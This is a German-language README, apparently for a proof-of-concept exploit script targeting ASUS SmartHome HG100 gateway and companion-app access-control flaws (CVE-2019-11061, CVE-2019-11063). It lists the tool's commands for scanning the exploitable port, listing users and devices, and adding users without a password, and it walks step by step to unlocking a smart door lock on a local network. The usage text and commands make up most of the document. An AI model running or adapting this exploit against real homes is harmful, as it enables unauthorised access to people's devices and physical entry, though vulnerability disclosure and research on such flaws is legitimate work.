
ASUS SmartHome Exploit für CVE-2019-11061 und CVE-2019-11063
CVE-2019-11061 : Fehlerhafte Zugriffskontrolle im HG100
Betroffene Produkte : ASUS SmartHome Gateway HG100 Firmware-Version < 4.00.09
CVE-2019-11063 : Fehlerhafte Zugriffskontrolle in der SmartHome-App
Betroffene Produkte : ASUS SmartHome Android APP Version < 3.0.45_190701
Wenn der Angreifer sich im selben internen Netzwerk befindet wie der HG100 oder ein mobiles Gerät mit der Begleit-App (Android oder iPhone). Der Angreifer kann Steuerungsanfragen an diese senden.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
Exploitierbaren Port auf einem Mobilgerät (mit installierter Begleit-App für Android oder iPhone) scannen :
P.S. Die Option -v listet die Benutzer auf, die dem HG100 hinzugefügt wurden.
oder
Exploitierbaren Port des HG100 scannen :
Alle Benutzer abrufen, die dem HG100 hinzugefügt wurden:

oder einen neuen hinzufügen:
Hinweis: Verwenden Sie https://10.42.50.166:8083 für das Argument „cmd".
Beispiel:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
Alle Geräteinformationen unter dem SmartHome Gateway abrufen:
P.S. Wenn die Option --user nicht gesetzt ist, wird automatisch der erste Benutzer im HG100 ausgewählt. (Da kein Passwort benötigt wird)
Vergleich mit der App:
Das Türschloss steuern (entriegeln).
P.S. Der Wert 1028 stammt aus der Option -l (Schritt 3).
Ergebnis:
